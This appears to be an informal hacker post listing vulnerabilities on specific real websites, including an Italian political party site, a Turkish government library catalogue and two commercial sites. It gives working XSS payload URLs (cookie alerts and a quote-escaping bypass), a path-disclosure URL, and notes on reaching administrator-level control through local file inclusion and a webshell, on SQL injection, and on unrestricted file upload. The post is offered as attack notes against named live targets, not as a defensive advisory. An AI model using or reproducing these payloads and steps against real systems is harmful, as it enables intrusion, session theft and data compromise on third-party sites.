pro(re)gress

http://servizi.pdl.it/cartoline/adesioni/segnala.php just <script>alert(document.cookie);</script> in the form

-Data leak- http://kutuphane.tuik.gov.tr/yordambt/liste.php?-skip=0&-atla=0&-sayfa=01&Alan3=&Alan5=&anatur=&bolum=&alttur=&sekil=&ortam=&dil=&yayintarihi=&kgt=&gorsel=&kurumyayini=&cAlanlar=pollo&aa=eseradi&-max=16&universite=&enstitu=&anabilimdali=&bilimdali=&sureliilkharf=&sure=&biryil=&birdergitrh=&birsayi=&biricindekiler= we can see the full path within the errors -> C:\Inetpub\wwwroot\yordambt ex file: _dil.php | index.php | liste.php | _yardim.php | arama.php | anasayfa.php | url.php After getting access through a lfi it's possible to see that we are on a (windows) box with the default configuration, with the permissions for -everybody- in some important folders. It's possible to operate quite like an administrator with a simple -webshell- script There are some shared folders without password on other boxes ------ The scripts available from the web...

this xss is locked by the webserver www.ascension-tech.com/searchresults.asp?searWords=<script>alert(document.cookie);</script>&Go.x=0&Go.y=0 this one is working without problems because there's a javascript that is using the input without sanitizing it. It seems that only the first ' single quote is escaped.... and we add another one. http://www.ascension-tech.com/searchresults.asp?searWords=%27%27%3Balert%28%271%27%29%3Bvar+asd%3D%27&Go.x=12&Go.y=12 The problem is within "Search Engine Builder 2010"

(they are not working anymore - check webcaches) www.ovosodo.net xss in the requests (simple) Sql injection (there's no need to write the injection string ... it's very simple) http://www.ovosodo.net/area_clienti.asp after *login* it's possible to upload anything that will be available in http://www.ovosodo.net/images/upload/originali/